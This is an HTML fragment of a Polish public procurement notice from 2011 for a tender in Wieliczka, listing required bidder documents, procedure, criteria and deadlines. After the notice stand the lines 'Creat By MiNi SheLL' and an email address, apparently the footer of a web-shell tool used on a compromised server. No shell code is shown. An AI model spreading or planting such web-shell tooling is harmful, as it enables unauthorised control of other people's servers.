<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kartę tytułową oferty - sporządzone według formularza stanowiącego 
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 uPzp - sporządzone według formularza stanowiącego.
Oświadczenie o udzieleniu gwarancji.
Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy 
oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 uPZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmian nazwy, siedziby lub innych danych Wykonawcy,
prośby Wykonawcy o udział lub zmianę podwykonawców,
zmianę terminu wykonywania umowy wynikającą z niekorzystnych warunków atmosferycznych
zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych -np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji, pozyskiwaniem środków finansowych, dotacji,
zaoferowania przez Wykonawcę maszyny o jeszcze lepszych parametrach niż opisanych niniejszą SIWZ przy zachowaniu ceny zaoferowanej pierwotnie. 
wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.solnemiasto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32-020 Wieliczka ul Tadeusza Kościuszki 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 09:50, miejsce: 32-020 Wieliczka ul Tadeusza Kościuszki 15 - sekretariat Prezesa Spółki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com